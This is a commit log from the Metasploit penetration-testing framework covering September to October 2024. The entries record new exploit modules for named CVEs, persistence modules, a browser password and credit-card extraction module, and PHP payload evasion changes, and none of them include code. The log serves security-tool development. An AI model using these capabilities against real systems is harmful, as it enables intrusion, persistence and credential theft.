Test and respond to comments
2024-10-09 22:52:55 -07:00
jheysel-r7
b72f70cbac
Apply suggestions from code review
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-10-10 00:40:54 -04:00
Jack Heysel
7a78c0d724
Updated authors
2024-10-09 13:14:09 -07:00
Jack Heysel
a4ef40a233
Updated docs with Options section
2024-10-09 13:08:20 -07:00
Jack Heysel
b94b2f3c72
Merge conflicts and rubocop
2024-10-09 12:59:59 -07:00
Jack Heysel
e8711c5b20
Magento XXE to GLIBC buffer overflow
2024-10-09 12:53:29 -07:00
Jack Heysel
9536eaae2d
Magento XXE to GLIBC buffer overflow
2024-10-09 12:36:53 -07:00
Spencer McIntyre
5b69945386
Merge pull request #19542 from dledda-r7/docs-19454
...
docs: adding motd_persistence docs
2024-10-09 14:02:32 -04:00
dledda-r7
3211edd83c
docs: review changes
2024-10-09 12:18:35 -04:00
Valentin Lobstein
c259ce090a
Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2024-10-09 17:22:33 +02:00
Valentin Lobstein
c15f186311
Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2024-10-09 00:04:54 +02:00
Valentin Lobstein
fb35f6709a
Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2024-10-09 00:04:44 +02:00
Valentin Lobstein
94145eafe9
Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2024-10-09 00:04:32 +02:00
Valentin Lobstein
6c048df53f
Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2024-10-09 00:04:23 +02:00
Valentin Lobstein
de5324e160
Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2024-10-09 00:04:13 +02:00
Valentin Lobstein
3987a761e7
Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2024-10-09 00:04:01 +02:00
Valentin Lobstein
31a66d537b
Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2024-10-09 00:03:52 +02:00
Valentin Lobstein
c1521633f4
Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2024-10-09 00:03:42 +02:00
Valentin Lobstein
8cbe572f49
Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2024-10-09 00:03:32 +02:00
Valentin Lobstein
d01e8d4dd5
Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2024-10-09 00:03:23 +02:00
dledda-r7
2762132830
docs: adding motd_persistence docs
2024-10-08 11:22:13 -04:00
GhostlyBox
967f7c30a0
Update enum_unattend.rb
...
Included checks for '.vmimport' files which may have been created by the AWS EC2 VMIE service which will still contain cleartext credentials.
2024-10-07 17:58:30 +01:00
Graeme Robinson
f3bb48f277
Update werkzeug_debug_rce documentation to include new logged messages
2024-10-07 11:56:16 +01:00
Graeme Robinson
3e422c235b
Use random number to check for code execution in werkzeug_debug_rce.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-10-07 10:59:29 +01:00
Graeme Robinson
255ab5c3ff
Change some messages from vprint to print werkzeug_debug_rce.rb
2024-10-07 10:31:03 +01:00
Graeme Robinson
8ad38f1d1a
Appease the linter when checking werkzeug_debug_rce.rb
2024-10-06 20:43:25 +01:00
Graeme Robinson
97c5afed52
Update werkzeug exploit module documentation
2024-10-06 20:19:48 +01:00
Graeme Robinson
d135b572f5
Add support for Cookie/PIN generation to Werkzeug RCE
2024-10-06 20:18:12 +01:00
Alex
9eda0338af
Improved readability and other small fixes
2024-10-06 10:19:10 +02:00
Chocapikk
3515015e1b
Lint
2024-10-04 19:35:15 +02:00
NtAlexio2
29c0a10fd2
allow settings the RPORT option for pipe_dcerpc_auditor
2024-10-04 12:37:06 -04:00
Valentin Lobstein
686f31aac1
Update modules/exploits/multi/http/wp_givewp_rce.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-10-04 17:32:18 +02:00
Valentin Lobstein
888c446f9a
Update modules/exploits/multi/http/wp_givewp_rce.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-10-04 17:32:10 +02:00
Valentin Lobstein
3a244212e2
Update modules/exploits/multi/http/wp_givewp_rce.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-10-04 17:32:03 +02:00
Valentin Lobstein
b8aad8b22f
Update modules/exploits/multi/http/wp_givewp_rce.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-10-04 17:31:54 +02:00
Chocapikk
98b857e1a7
Lint
2024-10-04 18:04:21 +02:00
Spencer McIntyre
f2a723541d
Add a test for the python/exec payload
2024-10-04 11:10:50 -04:00
Spencer McIntyre
c051ea5a7f
Add a python/exec payload to execute OS commands
2024-10-04 10:03:08 -04:00
Valentin Lobstein
0dba8f0963
Update modules/exploits/multi/http/wp_givewp_rce.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-10-04 16:01:29 +02:00
Valentin Lobstein
48e740d1fc
Update documentation/modules/exploit/multi/http/wp_givewp_rce.md
...
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-10-03 16:34:24 +02:00
Chocapikk
05c579fd65
Add report_host, report_service and report_vuln
2024-10-03 16:12:37 +02:00
Chocapikk
5733d43fb0
Update check function
2024-10-03 14:13:29 +02:00
Metasploit
5e2fab24ef
Bump version of framework to 6.4.30
2024-10-03 03:42:02 -05:00
Metasploit
f5a1ab1c60
automatic module_metadata_base.json update
2024-10-02 17:04:44 -05:00
jheysel-r7
8d6972081f
Land #19480 update service_persistence for openrc
...
This updates exploits/linux/local/service_persistence.rb to work on systems that are running OpenRC
2024-10-02 17:48:18 -04:00
Metasploit
745f61e3f8
automatic module_metadata_base.json update
2024-10-02 15:19:27 -05:00
jheysel-r7
1cdaeac843
Land #19463 Add Acronis Cyber Default Password RCE
...
This adds an RCE module Acronis Cyber Infrastructure Default Password [CVE-2023-45249]
2024-10-02 16:02:50 -04:00
Metasploit
cb060d9161
automatic module_metadata_base.json update
2024-10-02 14:05:07 -05:00
Chocapikk
d14866a34d
Update description
2024-10-02 21:02:26 +02:00
Chocapikk
1d083cf9e8
Add credit for the bypass
2024-10-02 20:57:57 +02:00
Brendan
dc03b02857
Merge pull request #19510 from bcoles/cups_browsed_info_disclosure
...
Add cups-browsed Information Disclosure module
2024-10-02 13:48:40 -05:00
Chocapikk
58878db970
update doc
2024-10-02 19:56:22 +02:00
Chocapikk
fbb74a6d2d
Add bypass for GiveWP RCE (CVE-2024-8353)
2024-10-02 19:53:20 +02:00
Metasploit
8dc89cac14
automatic module_metadata_base.json update
2024-10-02 08:20:42 -05:00
adfoster-r7
e614e90a88
Merge pull request #19526 from rapid7/revert-19397-replace-readline-with-reline
...
Revert "Replace Readline with Reline"
2024-10-02 13:55:24 +01:00
Simon Janusz
a31261ecf2
Revert "Replace Readline with Reline"
2024-10-02 13:15:12 +01:00
jvoisin
811678a793
Add openrc to exploits/linux/local/service_persistence.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-10-02 12:54:33 +02:00
jheysel-r7
c7d1e3411a
Land #19471 Add fuzzy-use plugin
...
This adds a plugin that offers the fzuse command to offer a different UI for the selection of modules. It requires fzf to be present.
2024-10-01 14:28:11 -04:00
adfoster-r7
2ea71c410c
Merge pull request #19523 from adfoster-r7/fix-windows-dns-crash-on-bootup
...
Fix windows DNS crash on bootup
2024-10-01 13:49:05 +01:00
adfoster-r7
49a7caf097
Fix windows DNS crash on bootup
2024-10-01 13:04:27 +01:00
Metasploit
b2e4ec9e29
automatic module_metadata_base.json update
2024-09-30 16:37:15 -05:00
jheysel-r7
8761226b97
Land #19456 VICIdial Auth RCE module
...
This adds a module to exploit CVE-2024-8504 an authenticated RCE in VICIdial
2024-09-30 17:13:33 -04:00
Chocapikk
f52cd8ba57
Add coding: binary header
2024-09-30 13:01:25 +02:00
Spencer McIntyre
669ea97d54
Revert a change that exposed the user store
2024-09-27 17:45:33 -04:00
bcoles
7cf5782b13
Add cups-browsed Information Disclosure module
2024-09-28 02:35:39 +10:00
adfoster-r7
953f6c1594
Merge pull request #19508 from cgranleese-r7/mssql-acceptance-remove-bundler-version
...
Removes bundler version from MSSQL acceptance testing
2024-09-27 16:02:11 +01:00
cgranleese-r7
f520d7ba05
Removes bundler version from MSSQL acceptance testing
2024-09-27 14:06:14 +01:00
adfoster-r7
48c358f2ee
Land #19507 , updates failing MSSQL docker health check
2024-09-27 14:01:24 +01:00
cgranleese-r7
c94b4028e3
Update failing mssql docker health check
2024-09-27 12:49:49 +01:00
Alex
a4fd4df052
Merge branch 'rapid7:master' into enum_browsers
2024-09-27 08:06:17 +02:00
Alex
6d28e4b350
Update modules/post/windows/gather/enum_browsers.rb
...
Co-authored-by: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com >
2024-09-27 08:03:02 +02:00
Alex
4a9754313a
Update modules/post/windows/gather/enum_browsers.rb
...
Co-authored-by: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com >
2024-09-27 08:02:57 +02:00
Alex
1e67d200d2
Update modules/post/windows/gather/enum_browsers.rb
...
Co-authored-by: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com >
2024-09-27 08:02:48 +02:00
Metasploit
fa43885eca
automatic module_metadata_base.json update
2024-09-26 20:00:39 -05:00
jheysel-r7
94c19395f3
Merge pull request #19466 from jvoisin/singles_php
...
Use php_preamble/php_system_block instead of `system` in payloads/singles/php/
2024-09-26 20:35:40 -04:00
Chocapikk
c2a803aba3
Lint
2024-09-27 01:25:37 +02:00
Chocapikk
10a4b24ed7
Better file clean
2024-09-27 01:17:07 +02:00
adfoster-r7
55943e797b
Land #19505 , Fix broken OSX Java compilation tests
2024-09-26 23:32:46 +01:00
Metasploit
ab7403147f
Bump version of framework to 6.4.29
2024-09-26 17:26:27 -05:00
adfoster-r7
fa2d13b988
Move Java meterpreter compilation to linux
2024-09-26 23:07:38 +01:00
h00die-gr3y
c43a4f4b0b
Fixed cluster ID issue
2024-09-26 21:53:27 +00:00
Chocapikk
2304bde907
Add suggestions + clean database files during on_new_session
2024-09-26 23:48:51 +02:00
Jack Heysel
4f846eebe0
Fixed paload spec
2024-09-26 14:36:20 -07:00
Metasploit
44ad0e98d5
automatic module_metadata_base.json update
2024-09-26 16:27:04 -05:00
jheysel-r7
05ff8359b8
Merge pull request #19436 from h4x-x0r/CVE-2024-6670
...
WhatsUp Gold SQL Injection (CVE-2024-6670) Module
2024-09-26 17:04:30 -04:00
Metasploit
b00b808966
automatic module_metadata_base.json update
2024-09-26 14:31:49 -05:00
Brendan
dbc020a745
Merge pull request #19441 from Takahiro-Yoko/cve_2023_0386_priv_esc
...
Land #19441 , Add module: Linux Priv Esc (OverlayFS copying bug) CVE-2023-0386
2024-09-26 14:07:17 -05:00
Alex
78f7327ea7
Update enum_browsers.rb
2024-09-26 20:49:42 +02:00
bwatters-r7
3e6572abde
Update binary
2024-09-26 13:45:44 -05:00
Alex
6cc6841821
Update modules/post/windows/gather/enum_browsers.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-09-26 20:44:45 +02:00
Valentin Lobstein
a9901d00a9
Update modules/exploits/unix/webapp/byob_unauth_rce.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-09-26 20:24:24 +02:00
Valentin Lobstein
499a1c30b5
Update modules/exploits/unix/webapp/byob_unauth_rce.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-09-26 20:24:14 +02:00
Valentin Lobstein
96f9bf61ac
Update modules/exploits/unix/webapp/byob_unauth_rce.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-09-26 20:24:02 +02:00
Alex
f106f1cf2c
Add enum_browsers post exploitation module
...
This post-exploitation module extracts sensitive browser data from both Chromium-based and Gecko-based browsers on the target system. It supports the decryption of passwords and cookies using Windows Data Protection API (DPAPI) and can extract additional data such as browsing history, keyword search history, download history, autofill data, and credit card information.
2024-09-26 19:21:42 +02:00
cgranleese-r7
b7a71b36c8
Land #19502 , Update docker Ruby version
2024-09-26 16:09:37 +01:00
Metasploit
97038a772c
automatic module_metadata_base.json update
2024-09-26 08:38:08 -05:00
Spencer McIntyre
b41caa22d9
Merge pull request #19475 from NtAlexio2/smb_modules_rport
...
Allow setting the RPORT option for pipe_auditor
2024-09-26 09:19:27 -04:00
h4x-x0r
6c3e9338f7
Updated documentation
...
Updated documentation
2024-09-26 05:50:52 +01:00
h4x-x0r
abddaf5657
Limit terminal output
...
Use TICKETSTODUMP instead of n characters
2024-09-26 05:43:55 +01:00
h4x-x0r
e80c66d80a
linting
2024-09-26 05:08:41 +01:00
h4x-x0r
ac711e32a0
minor updates
...
added report_vuln, report_service, limited console output
2024-09-26 05:04:38 +01:00
h4x-x0r
c20b1d8a03
minor fixes
...
minor fixes
2024-09-26 04:01:36 +01:00
jheysel-r7
d9f1a061b3
Merge branch 'master' into singles_php
2024-09-25 20:41:08 -04:00
Jack Heysel
e392894b47
Unit test fix attempt
2024-09-25 17:39:02 -07:00
jheysel-r7
97e50ccb23
Merge pull request #19467 from jvoisin/wordpress_portable
...
Make lib/msf/core/exploit/remote/http/wordpress/admin.rb a tad more portable
2024-09-25 20:25:10 -04:00
Metasploit
4b05de522d
automatic module_metadata_base.json update
2024-09-25 19:02:36 -05:00
jheysel-r7
256fd9c242
Merge pull request #19451 from jvoisin/phpnop
...
Improve modules/nops/php/generic.rb
2024-09-25 19:45:37 -04:00
Alex Romero
09ffbde5fe
Update modules/auxiliary/scanner/smb/pipe_auditor.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-09-26 01:57:32 +03:30
Alex Romero
e517aaf716
Update modules/auxiliary/scanner/smb/pipe_auditor.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-09-26 01:57:19 +03:30
Alex Romero
23f062af53
Update modules/auxiliary/scanner/smb/pipe_auditor.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-09-26 01:56:52 +03:30
Metasploit
7b470509b8
automatic module_metadata_base.json update
2024-09-25 13:44:58 -05:00
Spencer McIntyre
34ed3836fc
Update the docs
2024-09-25 14:22:31 -04:00
jheysel-r7
456c57b031
Merge pull request #19453 from Chocapikk/vicidial_sqli
...
Add VICIdial Time-based SQL Injection Module (CVE-2024-8503)
2024-09-25 14:19:42 -04:00
Chocapikk
1e95cba5f2
Randomize values
2024-09-25 18:55:26 +02:00
h4x-x0r
d4cd4aa843
added check method
...
added check method
2024-09-25 17:41:49 +01:00
h4x-x0r
174ed4ec97
minor improvements
...
minor improvements
2024-09-25 17:29:04 +01:00
h4x-x0r
5f95b2bf0d
Documentation
...
Documentation
2024-09-25 17:15:54 +01:00
adfoster-r7
566a7f1c36
Update docker Ruby version
2024-09-25 16:30:05 +01:00
Valentin Lobstein
22443b53d6
Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-09-25 16:39:09 +02:00
Valentin Lobstein
0409d4ec9c
Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-09-25 16:38:36 +02:00
adfoster-r7
a794d2aa3c
Land #19501 , Mettle now copying gem correctly and running acceptance tests
2024-09-25 15:29:02 +01:00
cgranleese-r7
11b5a1c9c9
Mettle now copying gem correctly and running acceptance tests
2024-09-25 15:03:56 +01:00
h4x-x0r
d391999c92
Initial draft
...
Initial draft
2024-09-25 14:06:40 +01:00
h4x-x0r
ac56da3d21
CVE-2024-28987
...
CVE-2024-28987
2024-09-25 13:16:09 +01:00
cgranleese-r7
9b4c2fea2b
Land #19493 , Improve documentation for testing the post exploitation API against opened sessions
2024-09-25 10:16:58 +01:00
Chocapikk
a5d9a06b9a
Fix with datastore['RHOST']
2024-09-25 04:43:27 +02:00
Chocapikk
2d6862ccd4
Add recommendations
2024-09-25 03:57:17 +02:00
Chocapikk
a1b4106260
Fix wordpress_sqli_get_users_credentials and rename wordpress_sqli_initialize
2024-09-25 01:57:46 +02:00
Chocapikk
fa0d54eaf2
Add Metasploit::Credential::Creation to use create_credential
2024-09-25 01:00:48 +02:00
Chocapikk
3da638e37e
Using dynamic prefix in table
2024-09-25 00:58:09 +02:00
Chocapikk
14f1d6a786
Add Msf::Exploit::Remote::HTTP::Wordpress::SQLi
2024-09-25 00:33:19 +02:00
NtAlexio2
e365138387
update and display correct rport
2024-09-24 16:32:02 -04:00
adfoster-r7
6fcdd570d7
Improve documentation for testing post api and tests
2024-09-24 18:58:18 +01:00
Metasploit
f91c95b0a0
automatic module_metadata_base.json update
2024-09-24 11:43:07 -05:00
jheysel-r7
d11c2be4ea
Merge pull request #19375 from h4x-x0r/CVE-2024-20419
...
Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419) Module
2024-09-24 12:19:54 -04:00
adfoster-r7
480a938aaf
Land #19184 , Update bundler version
2024-09-24 17:02:31 +01:00
Christophe De La Fuente
b5107583f1
Fix crash in #extract_user_and_realm with specific san extension
2024-09-24 14:34:09 +02:00
Takah1ro
e89e573160
Update exploit binary
2024-09-24 19:36:39 +09:00
Dmitriy Shafranskiy
8060e6b3f9
Merge pull request #19483 from rapid7/SR-139850-snyk-folders-exclusion
...
Excluding test folders from snyk scan (test data)
2024-09-24 12:36:33 +02:00
Metasploit
0ee44151f7
automatic module_metadata_base.json update
2024-09-24 04:29:35 -05:00
adfoster-r7
9ff47b0eb3
Update bundler version
2024-09-24 10:29:20 +01:00
Takah1ro
755830024c
Update exploit binary and remove unnecessary
2024-09-24 08:37:20 +09:00
Takah1ro
75329cc7c7
Add ;
2024-09-24 08:24:24 +09:00
Takah1ro
6d541b625f
Remove unnecessary shell_path
2024-09-24 08:18:30 +09:00
Takah1ro
a10459e772
Formatting exploit
2024-09-24 08:14:21 +09:00
Takahiro Yokoyama
130f146819
Apply suggestions from code review
...
Change to call setgid and setuid in the exploit before executing the payload
Co-authored-by: Brendan <bwatters@rapid7.com >
2024-09-24 08:06:26 +09:00
Takahiro Yokoyama
33152bf0ac
Update external/source/exploits/CVE-2023-0386/cve_2023_0386.c
...
Add setuid(0) and setgid(0)
Co-authored-by: Brendan <bwatters@rapid7.com >
2024-09-24 08:03:20 +09:00
Jack Heysel
8e2dbbbd56
Land #19416 , Add Traccar RCE module
...
This module exploits two vulnerabilities in Traccar v5.1 - v5.12 to
obtain remote code execution: A path traversal vulnerability
CVE-2024-24809 and an unrestricted file upload vulnerability
CVE-2024-31214.
2024-09-23 15:25:02 -07:00
jheysel-r7
e0e7c67ff7
Remove jsessionid parsing now that keep_cookies is being used
2024-09-23 18:12:01 -04:00
Jack Heysel
f254eeb65e
Added error handling
2024-09-23 14:16:26 -07:00
Valentin Lobstein
5408d0b5ac
Update documentation/modules/exploit/unix/webapp/byob_unauth_rce.md
2024-09-23 18:40:26 +02:00
Valentin Lobstein
b18cb3ecac
Update documentation/modules/exploit/unix/webapp/byob_unauth_rce.md
2024-09-23 18:40:19 +02:00
Spencer McIntyre
73bd3fb2cd
Merge pull request #19474 from sfewer-r7/bugfix-dns-windows
...
Bugfix for DNS resolver on Windows throwing NoMethodError
2024-09-23 11:44:48 -04:00
Jack Heysel
b475f0dccb
Land #19448 , Improve screensaver management
...
Add a number of improvements to modules/post/multi/manage/screensaver.rb
2024-09-23 08:31:38 -07:00
Stephen Fewer
ad98d749ca
Instead of only setting a single domain name via self.domain, set self.searchlist which already supports an array of items (thanks Spencer!).
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-09-23 15:50:24 +01:00
adfoster-r7
feb9ebd9e9
Land #19478 , Post::Linux::Kernel.kernel_arch: Add support for RISC-V and LoongArch
2024-09-23 15:44:34 +01:00
bcoles
a6ccce8446
Bump rex-arch to 0.1.16
2024-09-23 23:43:37 +10:00
h4x-x0r
322188a112
Refactoring
...
Refactored code to remove duplicate requests
2024-09-23 13:29:46 +01:00
cgranleese-r7
a27d491bf8
Land #19491 , Fix a crash in lib/msf/core/payload/php.rb
2024-09-23 10:53:53 +01:00
jvoisin
1647d3a96b
Fix a crash in lib/msf/core/payload/php.rb
...
As it seems that shuffle is a method
(https://ruby-doc.org/core-2.7.0/Array.html#method-i-shuffle )
and not a function.
As spotted by @Chocapikk in
https://github.com/rapid7/metasploit-framework/pull/19445#pullrequestreview-2320780104
2024-09-22 21:07:53 +02:00
bcoles
9de029e2fa
Post::Linux::Kernel.kernel_arch: Add support for RISC-V and LoongArch
2024-09-21 23:00:52 +10:00
Chocapikk
9e6adea0dc
Add BYOB Unauthenticated RCE module exploiting arbitrary file write and command injection (CVE-2024-45256, CVE-2024-45257)
2024-09-21 04:00:56 +02:00
cgranleese-r7
73a6f09d3e
Land #19484 , Temp removal of mssql acceptance tests
2024-09-20 16:18:25 +01:00
adfoster-r7
e5c1334541
Temp removal of mssql acceptance tests
2024-09-20 16:03:19 +01:00
adfoster-r7
43db34cf54
Land #19413 , Add automated acceptance tests for cmd_exec API
2024-09-20 15:23:17 +01:00
cgranleese-r7
cbd763fad5
Drys out some code
2024-09-20 14:54:03 +01:00
adfoster-r7
ab7e02d23f
Merge pull request #19397 from sjanusz-r7/replace-readline-with-reline
...
Replace Readline with Reline
2024-09-20 14:23:40 +01:00
Dmitriy Shafranskiy
5f1918cc38
Update .snyk
2024-09-20 13:53:34 +02:00
h00die-gr3y
589b0f8331
updated documentation
2024-09-20 10:29:17 +00:00
h00die-gr3y
8e62f22315
fifth release with the option to use your own SSH private key
2024-09-20 09:50:13 +00:00
Dmitriy Shafranskiy
1b7cdc46f1
Excluding test folders from snyk scan (test data)
...
```bash
snyk code test
pre:
469 Code issues found
35 [High] 298 [Medium] 136 [Low]
post:
160 Code issues found
28 [High] 71 [Medium] 61 [Low]
```
2024-09-20 09:35:56 +02:00
h00die-gr3y
8b197a60f9
fourth release addressing review comments of jheysel-r7
2024-09-19 20:54:55 +00:00
Chocapikk
0515a1d3bc
Update comment
2024-09-19 22:36:07 +02:00
Chocapikk
f715cc68df
Randomize values + add function to delete campaign
2024-09-19 22:33:50 +02:00
cgranleese-r7
2305fc4e9c
Land #19476 , Bump version of framework to 6.4.28
2024-09-19 19:20:14 +01:00
Spencer McIntyre
cd96bcd478
Merge pull request #19462 from jvoisin/auto_compile
...
Add an `Auto` option to live_compile
2024-09-19 12:03:43 -04:00
Spencer McIntyre
9b0af80d3b
Unnest the method and check for UNIXSocket
2024-09-19 11:18:02 -04:00
adfoster-r7
80f050a5f5
Bump version of framework to 6.4.28
2024-09-19 15:52:50 +01:00
NtAlexio2
48765fbfa5
allow setting the RPORT option for pipe_auditor
2024-09-19 10:43:40 -04:00
NtAlexio2
b172ef8d69
bugfix rport in smb_enumusers
2024-09-19 10:42:10 -04:00
cgranleese-r7
5ef3dfd531
Rebase to pull in #19428 changes
2024-09-19 11:13:07 +01:00
cgranleese-r7
8ab3b6c178
Address PR feedback
2024-09-19 11:09:14 +01:00
cgranleese-r7
7acea08c78
Refactors test to reduce code duplication
2024-09-19 11:09:14 +01:00
cgranleese-r7
44efbc21a8
Add automated acceptance tests for cmd_exec
2024-09-19 11:09:14 +01:00
sfewer-r7
9be50f74a8
The first array item will either be nil, or an array of domain names, so we pick the first one to avoid a NoMethodError for a =~ operation on an array object, during a call to the method valid?
2024-09-19 10:40:01 +01:00
jvoisin
38972a7b31
Add an Auto option to live_compile
...
Co-authored-by: zeroSteiner
2024-09-19 01:48:00 +02:00
adfoster-r7
3b33b23aa9
Land #19428 , Rename Acceptance::Meterpreter module to Acceptance::Session
2024-09-18 22:49:33 +01:00
Chocapikk
ae8df6c34b
Add working documentation + working exploit
2024-09-18 17:00:18 +02:00
Chocapikk
f62f5b2c9c
Add working documentation
2024-09-18 16:30:07 +02:00
Spencer McIntyre
ba65ecc6cd
Remove boilerplate docs
2024-09-18 10:19:04 -04:00
Spencer McIntyre
3227e2e035
Catch exceptions on client connections
2024-09-18 10:03:39 -04:00
jvoisin
b7fff5926b
Use php_preamble/php_system_block instead of system in payloads/singles/php/
...
The `php_preamble`/`php_system_block` combo has builtin low-hanging evasion for
PHP's `disabled_functions` configuration (eg. `system` might not be available
but `shell_exec` is), so use it instead of hardcoding `system`.
This commit also brings modules/payloads/singles/php/reverse_perl.rb's style
more in line with the other uses of `php_preamble`/`php_system_block`.
Oh, and it makes lib/msf/core/payload/php.rb work on older Ruby version as
well.
Co-authored-by: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com >
2024-09-18 12:40:55 +02:00
Chocapikk
005dc4941d
Update (still working on it)
2024-09-17 23:50:16 +02:00
Spencer McIntyre
caf79d80eb
Add a basic theme to make it look more integrated
2024-09-17 16:09:26 -04:00
jvoisin
9f4fa3ba67
Make lib/msf/core/exploit/remote/http/wordpress/admin.rb a tad more portable
...
- Randomize the license header, based on examples from
https://developer.wordpress.org/plugins/plugin-basics/header-requirements/ ,
as plugins developers are likely copy-pasting them in their own plugins.
- Use the php_preamble/php_system_block combo instead of hardcoding
system/base64, as `system` might not be available on some WordPress
deployments, and the combo has some low-hanging evasions for this case.
2024-09-17 21:53:27 +02:00
h00die-gr3y
9971aed96f
third release addressing majority of the review comments
2024-09-17 19:23:38 +00:00
Spencer McIntyre
ae26319e8f
Update fzuse to be self contained
2024-09-17 15:16:53 -04:00
H00die.Gr3y
d7fa23f30f
Apply suggestions from code review
...
Co-authored-by: bcoles <bcoles@gmail.com >
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-09-17 19:00:48 +02:00
Spencer McIntyre
409b1aed45
Land #19461 , Modernize NetWkstaUserEnum
...
Modernize NetWkstaUserEnum in smb scanner
2024-09-17 10:14:02 -04:00
Spencer McIntyre
7abfb6c205
Return nil on error to avoid another exception
2024-09-17 09:59:42 -04:00
Metasploit
1a14916e68
automatic module_metadata_base.json update
2024-09-17 07:32:43 -05:00
dledda-r7
0bf524482c
Land #19345 , Post module Windows LPE CVE-2024-30088
2024-09-17 08:13:21 -04:00
Metasploit
f8ada15dea
automatic module_metadata_base.json update
2024-09-17 06:15:03 -05:00
dledda-r7
6e696e24e5
Land #19457 , WP Plugin LiteSpeed Cache Account Take Over Module
2024-09-17 06:30:33 -04:00
NtAlexio2
d4378d6c82
change output format to old style
2024-09-16 18:28:01 -04:00
NtAlexio2
a93e008836
update ruby_smb version
2024-09-16 17:55:58 -04:00
jvoisin
862acbdbae
Improve screensaver management
...
- Add modern ways to unlock Linux machines remotely
- Use proper `register_options`
- Clarify the actions: lock/unlock, start/stop
- Add more platforms
- Add a couple of checks before running the commands
2024-09-16 23:41:37 +02:00
Alex Romero
9fac88f709
Update lib/msf/core/exploit/remote/ms_wkst.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-09-17 00:32:34 +03:30
h00die-gr3y
86c8879270
Added documentation
2024-09-16 19:54:59 +00:00
Jack Heysel
84a8eb7273
Respond to comments
2024-09-16 09:46:57 -07:00
cgranleese-r7
f20dcb27dd
Land #19443 , Remove an old comment in lib/msf/core/payload/php.rb
2024-09-16 14:59:05 +01:00
cgranleese-r7
062a1e72d7
Land #19445 , Minor improvements of lib/msf/core/payload/php.rb
2024-09-16 14:30:58 +01:00
cgranleese-r7
76b0bc5c47
Renames Acceptance::Meterpreter module to Acceptance::Session
2024-09-16 13:11:39 +01:00
cgranleese-r7
720723fa9c
Land #19414 , Add missing constants for the Kerberos login scanner
2024-09-16 11:11:52 +01:00
h00die-gr3y
455c5b2391
second release module
2024-09-15 20:01:27 +00:00
h00die-gr3y
1ba05ac88a
first release module
2024-09-15 19:47:32 +00:00
Takah1ro
30704c494a
Remove unnecessary strip_comments
2024-09-15 10:00:43 +09:00
NtAlexio2
92234641bc
modernize enumuser_domain in smb scanner
2024-09-13 16:12:01 -04:00
Jack Heysel
96e506d9f5
Fix cookie regex
2024-09-13 09:36:18 -07:00
Jack Heysel
e7da81c271
Fix AdminCookieError admin_cookie check
2024-09-13 09:35:43 -07:00
jheysel-r7
300d2f5aa9
Apply suggestions from code review
...
Co-authored-by: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com >
2024-09-13 11:58:08 -04:00
Metasploit
7db428cd8d
automatic module_metadata_base.json update
2024-09-13 08:19:05 -05:00
dledda-r7
83a31c8a2a
Land #19454 , Persistence post module using motd
2024-09-13 09:02:22 -04:00
dledda-r7
eda39a7d68
Land #19452 , Add docs on how to use ngrok with Metasploit
2024-09-13 03:34:55 -04:00
Chocapikk
04711c4416
Add suggestions
2024-09-12 22:58:44 +02:00
jvoisin
6d659e3aa8
Add modules/exploits/linux/local/motd_persistence.rb
2024-09-12 17:41:47 +02:00
Metasploit
76d55c9045
automatic module_metadata_base.json update
